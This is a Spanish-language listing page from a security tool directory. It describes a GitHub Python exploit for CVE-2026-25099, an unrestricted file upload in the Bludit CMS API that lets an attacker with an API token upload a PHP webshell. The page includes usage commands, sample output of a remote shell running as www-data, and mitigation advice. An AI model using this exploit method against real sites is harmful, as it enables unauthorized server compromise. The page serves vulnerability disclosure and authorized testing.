Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/yahiahamza/cve-2026-25099
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

# Exploit en Python para la carga de archivos sin restricciones en la API de Bludit CMS que conduce a la ejecución remota de código, proporcionando ejecución de comandos y shell interactiva para pruebas autorizadas.

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25099 - Bludit CMS API Subida de Archivos Sin Restricciones a RCE

Descripción

Las versiones de Bludit CMS anteriores a la 3.18.4 permiten a un atacante autenticado con un token de API válido subir archivos de cualquier tipo y extensión a través del endpoint POST /api/files/<page-key>. La función uploadFile() no realiza ninguna validación de extensión o contenido de archivo, lo que permite subir webshells PHP y ejecutarlos como www-data.

Versiones Afectadas

  • Vulnerable: Bludit < 3.18.4
  • Corregida: Bludit 3.18.4
  • Requisito previo: Token de API válido (visible en el panel de administración en Plugins → API)

Uso

root@kitploit:~
# Ejecución de un solo comando
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"

# Shell interactiva
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"

Ejemplo de Salida

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API File Upload to RCE
[*] Target: http://target
[*] Retrieving page key...
[+] Page key: create-your-own-content
[*] Uploading webshell...
[+] Shell uploaded: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] Verifying RCE...
[+] RCE confirmed: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Interactive shell (type 'exit' to quit)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

Capturas de Pantalla

PoC Execution

Mitigación

  • Actualizar a Bludit 3.18.4 o posterior
  • Deshabilitar el plugin de API si no es necesario
  • Monitorear /bl-content/uploads/ para detectar archivos PHP inesperados

Referencias

  • CVE-2026-25099 en MITRE
  • Análisis Técnico - yh.do

Autor

Yahia Hamza - https://yh.do

Aviso Legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. Úsala de forma responsable y solo contra sistemas para los que tengas permiso de prueba.

Descargar herramienta